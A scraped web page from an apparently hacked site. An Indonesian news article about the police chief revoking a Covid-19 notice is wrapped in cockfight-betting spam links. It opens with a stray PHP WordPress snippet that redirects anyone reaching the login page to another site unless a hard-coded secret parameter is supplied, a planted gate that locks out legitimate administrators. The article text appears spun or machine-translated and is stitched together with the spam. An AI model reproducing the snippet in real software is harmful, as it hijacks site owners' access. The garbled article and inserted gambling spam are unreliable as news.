//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Kapolri mencabut pemberitahuan PKS terkait pengobatan Covid-19: ini tidak berarti bahwa setiap orang dapat dengan bebas mengumpulkan massa. | adu ayam bali_s128.net login_s128.live

Kapolri mencabut pemberitahuan PKS terkait pengobatan Covid-19: ini tidak berarti bahwa setiap orang dapat dengan bebas mengumpulkan massa.

Jakarta TRIBUNNEWS.COM-Panitia Ketiga Anggota PKS DPR RI Habib Aboe Bakar Alhabsyi memahami langkah Kapolri Idham Azis mencabut nomor iklan MAK / 2 / III / 2020 yang dikeluarkan pada 19 Maret 2020 terkait kepatuhan terhadap kebijakan pemerintah. Dalam proses penanganan penyebaran Covid-19.

Menurutnya, hal ini mengikuti kebijakan pemerintah terhadap new normal.

“Tapi saya harap surat-surat telegram rahasia STR / 364 / VI / OPS.2. / 2020 dianggap langkah bijak. Ini bisa memicu heboh Covid-19 kedua,” ujarnya, Sabtu. (27 Juni 2020) kepada wartawan. — Baca: Di tengah pandemi, tantangan Pilkada serentak 2020: Pemerintah sudah sediakan #dirumahsaja

Aboe berharap perjanjian sanitasi selalu terwujud, menjaga jarak dan keramaian harus dilarang.

“Keberhasilan kita dalam mencegah penyebaran Covid -19 soooo tidak bergantung pada disiplin kita. Oleh karena itu, pencabutan keterangan Kapolri bukan berarti kita semua bisa berkumpul dengan bebas,” ujarnya. -Habib Aboe juga meminta polisi berkoordinasi dengan Bupati dan ketua kelompok kerja untuk mempercepat penanganan Covid-19.

“Kebijakan daerah harus selalu didukung oleh kepolisian. Itu termasuk pengendalian untuk menjaga jarak di tempat umum. Selain itu, untuk zona merah, kami meminta Polri untuk terus membantu menata ketertiban umum,” ucapnya. -Sebelumnya, setelah tiga bulan beroperasi, Kapolri Jenderal Idham Azis akhirnya mencabut pernyataan Kapolri pada MAKO / 2 / III / 2020 tentang kebijakan pemerintah dalam mengelola penyebaran virus corona (Covid- 19) Dirilis pada 19 Maret 2020.

Isi pernyataan Kapolri memuat larangan dan imbauan kepada publik selama pandemi virus corona.

Leave a comment

adu ayam bali_s128.net login_s128.live